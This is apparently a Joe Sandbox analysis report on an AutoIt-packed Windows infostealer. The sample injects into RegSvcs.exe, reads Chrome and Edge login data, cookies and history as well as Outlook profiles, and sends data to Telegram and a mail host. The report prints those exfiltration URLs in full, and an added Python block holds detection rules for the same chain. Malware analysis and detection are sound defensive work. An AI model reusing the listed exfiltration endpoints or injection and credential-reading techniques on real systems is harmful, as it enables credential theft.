Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B10B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B11663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
Source: RubzLi27lr.exe, spadixes.exe.0.dr | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: RubzLi27lr.exe, spadixes.exe | Binary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AD0698 cpuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B28195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B0D27A GetUserNameW
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AEB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00AB42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

Source: Yara match | File source: 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: spadixes.exe | Binary or memory string: WIN_81
Source: spadixes.exe | Binary or memory string: WIN_XP
Source: spadixes.exe.0.dr | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: spadixes.exe | Binary or memory string: WIN_XPe
Source: spadixes.exe | Binary or memory string: WIN_VISTA
Source: spadixes.exe | Binary or memory string: WIN_7
Source: spadixes.exe | Binary or memory string: WIN_8
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
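The two behaviours that matter most for detection on this page are the injection chain recorded under "HIPS / PFW / Operating System Protection Evasion" (wscript.exe starts spadixes.exe from AppData, which writes RWX memory into a RegSvcs.exe it created with a command line naming a different binary) and the credential reads listed above (RegSvcs.exe opening Chrome/Edge Login Data, Cookies, History and the Outlook MAPI profile key, then resolving api.telegram.org and geo-IP hosts). The block below is an added example, not code from the Joe Sandbox report or from the sample: a small rule pass over constructed Sysmon/EDR-style events modelled on that chain. The Sysmon field names (Image, ParentImage, CommandLine, SourceImage, TargetImage, GrantedAccess, TargetFilename, QueryName) are real; the "FileOpen" and "RegOpen" records are an assumed EDR format, because Sysmon does not log file or registry reads; the Startup-folder path and the MSBuild/Chrome control events are assumptions for the demo.

```python
"""Added example; not code from the Joe Sandbox report or from the sample.
Rule pass over constructed Sysmon/EDR-style events that mirror the report's
process tree. Every event below is made up for the demo."""
import re

REGSVCS = re.compile(r"\\microsoft\.net\\framework(?:64)?\\v[\d.]+\\regsvcs\.exe$", re.I)
USER_WRITABLE = re.compile(r"^c:\\users\\[^\\]+\\appdata\\", re.I)
STARTUP_SCRIPT = re.compile(r"\\start menu\\programs\\startup\\[^\\]+\.(?:vbs|vbe|js|jse|wsf|bat|cmd)$", re.I)
BROWSER_STORE = re.compile(r"\\user data\\[^\\]+\\(?:network\\)?(?:login data|cookies|web data|history|top sites)$", re.I)
BROWSER_EXE = re.compile(r"\\(?:chrome|msedge|brave|opera|vivaldi)\.exe$", re.I)
MAPI_PROFILE = re.compile(r"\\windows messaging subsystem\\profiles\\", re.I)
BEACON_HOSTS = {"api.telegram.org", "checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
PROCESS_VM_WRITE = 0x0020  # process access-mask bit; PROCESS_ALL_ACCESS (0x1FFFFF) includes it


def first_exe(cmdline):
    """First token of a command line (quoted or bare), lower-cased."""
    m = re.match(r'\s*"([^"]+)"|\s*(\S+)', cmdline or "")
    return ((m.group(1) or m.group(2)) if m else "").lower()


def evaluate(ev):
    """Return the names of the rules that fire for one event dict."""
    hits = []
    kind, image = ev["EventID"], ev.get("Image", "")
    if kind == 1:  # Sysmon process creation
        parent = ev.get("ParentImage", "")
        if parent.lower().endswith("\\wscript.exe") and USER_WRITABLE.match(image):
            hits.append("wscript_launches_appdata_exe")
        if REGSVCS.search(image):
            if USER_WRITABLE.match(parent):
                hits.append("regsvcs_spawned_from_appdata")
            first = first_exe(ev.get("CommandLine"))
            if first and first != image.lower():  # hollowed host carries the injector's command line
                hits.append("regsvcs_cmdline_names_other_exe")
    elif kind == 10:  # Sysmon process access
        if (USER_WRITABLE.match(ev.get("SourceImage", "")) and REGSVCS.search(ev.get("TargetImage", ""))
                and int(ev.get("GrantedAccess", "0"), 16) & PROCESS_VM_WRITE):
            hits.append("appdata_process_writes_regsvcs_memory")
    elif kind == 11 and STARTUP_SCRIPT.search(ev.get("TargetFilename", "")):  # Sysmon file create
        hits.append("script_dropped_in_startup")
    elif kind == 22 and REGSVCS.search(image) and ev.get("QueryName", "").lower() in BEACON_HOSTS:  # Sysmon DNS
        hits.append("regsvcs_resolves_beacon_host")
    elif kind == "FileOpen" and BROWSER_STORE.search(ev.get("TargetFilename", "")) and not BROWSER_EXE.search(image):
        hits.append("non_browser_reads_credential_store")
    elif kind == "RegOpen" and MAPI_PROFILE.search(ev.get("TargetObject", "")) and not image.lower().endswith("\\outlook.exe"):
        hits.append("non_outlook_reads_mapi_profile")
    return hits


def scan(events):
    """Map every rule that fired to the set of images that triggered it."""
    findings = {}
    for ev in events:
        actor = ev.get("SourceImage") or ev.get("Image")
        for rule in evaluate(ev):
            findings.setdefault(rule, set()).add(actor)
    return findings


SPADIXES = r"C:\Users\user\AppData\Local\Hegeleos\spadixes.exe"
REGSVCS_EXE = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
CHROME_LOGIN_DATA = r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"

# Constructed events modelled on the report's process tree (assumed Startup path, assumed controls).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": SPADIXES, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": '"' + SPADIXES + '"'},
    {"EventID": 1, "Image": REGSVCS_EXE, "ParentImage": SPADIXES,
     "CommandLine": r'"C:\Users\user\Desktop\RubzLi27lr.exe"'},
    {"EventID": 10, "SourceImage": SPADIXES, "TargetImage": REGSVCS_EXE, "GrantedAccess": "0x1FFFFF"},
    {"EventID": 11, "Image": SPADIXES,
     "TargetFilename": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spadixes.vbs"},
    {"EventID": "FileOpen", "Image": REGSVCS_EXE, "TargetFilename": CHROME_LOGIN_DATA},
    {"EventID": "RegOpen", "Image": REGSVCS_EXE,
     "TargetObject": r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"EventID": 22, "Image": REGSVCS_EXE, "QueryName": "api.telegram.org"},
    # benign controls: a build tool running RegSvcs on its own path, and Chrome reading its own store
    {"EventID": 1, "Image": REGSVCS_EXE,
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
     "CommandLine": '"' + REGSVCS_EXE + '" MyAssembly.dll'},
    {"EventID": "FileOpen", "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "TargetFilename": CHROME_LOGIN_DATA},
]

if __name__ == "__main__":
    for rule, actors in sorted(scan(SAMPLE_EVENTS).items()):
        print(f"{rule}: {', '.join(sorted(actors))}")
```

The command-line mismatch rule is the cheapest of these: the report shows RegSvcs.exe created with the command line `"C:\Users\user\Desktop\RubzLi27lr.exe"`, which a legitimate RegSvcs invocation never has, and it needs only a process-creation event. The memory-write and credential-store rules need process-access or file-read telemetry, which is why the example keeps them separate from the Sysmon-native ones.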

                Remote Access Functionality

Source: Yara match | File source: 00000003.00000002.3370428340.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3370233231.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6108, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.spadixes.exe.3fd0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.spadixes.exe.3c70000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2340360837.0000000003FD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2179415372.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3368520265.0000000000435000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 6568, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: spadixes.exe PID: 416, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 2136, type: MEMORYSTR
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B31204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\RubzLi27lr.exe | Code function: 0_2_00B31806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket
Source: C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | Code function: 2_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK matrix (reconstructed from the flattened table; the number in parentheses is the count the report shows next to a technique, i.e. how many of its signatures were mapped to it; entries without a count are matrix cells no signature mapped to; column placement follows the report's own layout):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: Scripting (111); DLL Side-Loading (1); Valid Accounts (2); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (212); Registry Run Keys / Startup Folder (2); Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Masquerading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (111); Access Token Manipulation (21); Process Injection (212); Dynamic API Resolution
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (3); System Information Discovery (127); Security Software Discovery (321); Virtualization/Sandbox Evasion (111); Process Discovery (2); Application Window Discovery (11); System Owner/User Discovery (1); System Network Configuration Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Web Service (1); Ingress Tool Transfer (4); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (3); Application Layer Protocol (24); Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior graph (ID 1587901, sample RubzLi27lr.exe, start date 10/01/2025, architecture WINDOWS, score 100), recovered from the graph text:

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures.
Contacted names: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains.

Process tree:
RubzLi27lr.exe (started): Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection
    dropped: C:\Users\user\AppData\Local\...\spadixes.exe, PE32
    spadixes.exe (started): Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; 4 other signatures
        dropped: C:\Users\user\AppData\...\spadixes.vbs, data
        RegSvcs.exe (started)
            mail.acadental.com 3.130.71.34 (ports 49871, 49947, 587), AMAZON-02US, United States
            api.telegram.org 149.154.167.220 (ports 443, 49814, 49913), TELEGRAMRU, United Kingdom
            2 other IPs or domains
wscript.exe (started): Windows Scripting host queries suspicious COM object (likely to drop second stage)
    spadixes.exe (started): Writes to foreign memory regions; Maps a DLL or memory area into another process
        RegSvcs.exe (started): Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
RubzLi27lr.exe | 68% | Virustotal |
RubzLi27lr.exe | 68% | ReversingLabs | Win32.Trojan.AutoitInject
RubzLi27lr.exe | 100% | Avira | HEUR/AGEN.1319493
RubzLi27lr.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | 100% | Avira | HEUR/AGEN.1319493
C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Hegeleos\spadixes.exe | 68% | ReversingLabs | Win32.Trojan.AutoitInject
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label
http://mail.acadental.com | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mail.acadental.com | 3.130.71.34 | true | true | | unknown
reallyfreegeoip.org | 104.21.16.1 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
checkip.dyndns.com | 193.122.6.168 | true | false | | high
checkip.dyndns.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:56:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:210979%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:21:40%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20210979%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
http://checkip.dyndns.org/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/ | RegSvcs.exe, 00000009.00000002.3370233231.0000000003179000.00000004.00000800.00020000.00000000.sdmp | false | | high
